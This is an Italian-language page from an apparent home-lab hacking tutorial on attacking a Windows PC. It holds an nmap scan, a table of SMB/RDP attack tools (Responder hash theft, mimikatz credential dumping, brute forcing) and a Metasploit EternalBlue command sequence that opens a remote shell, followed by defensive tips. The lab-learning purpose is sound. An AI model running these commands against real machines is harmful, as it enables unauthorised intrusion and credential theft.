Home › Dispositivi › PC Windows

PC Windows — cosa puoi fare

Il PC di casa/lab: si testano SMB (condivisioni), RDP (desktop remoto), vecchie vulnerabilità e le credenziali.

Solo sul tuo PC o in lab (es. una VM Windows).

Passo 1 — trovalo e guarda le porte

sudo nmap -sV -p- 192.168.1.20

Porte tipiche: 445/139 (SMB), 3389 (RDP), 5985 (WinRM), 135 (RPC).

Cosa puoi fare / testare

CosaComeTool
Vedere le condivisioni SMBElenchi share, spesso anonimesmbclient / enum4linux
Cercare vulnerabilità SMBScript che testano MS17-010 ecc.nmap
EternalBlue (Windows vecchi)MS17-010 → shell SYSTEMmetasploit
Brute di SMB/RDPProvi credenziali su tutta la retecrackmapexec / hydra
Shell con credenziali/hashEsegui comandi da remotoimpacket / evil-winrm
Rubare hash in reteAvveleni LLMNR e catturi NTLMresponder
Dump credenziali (dopo accesso)Password/hash dalla memoriamimikatz

Prova a casa (VM Windows vulnerabile)

sudo nmap -p445 --script smb-vuln* 192.168.1.20
msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.20 ; set LHOST tun0 ; exploit

Tutorial: Exploitare i servizi · Privesc Windows.

Difesa

  • Aggiornamenti sempre attivi (EternalBlue è del 2017, ma i PC non patchati esistono ancora).
  • Password forti + niente SMB/RDP esposti a Internet.
  • Disattiva SMBv1; usa firewall; account senza admin per l'uso quotidiano.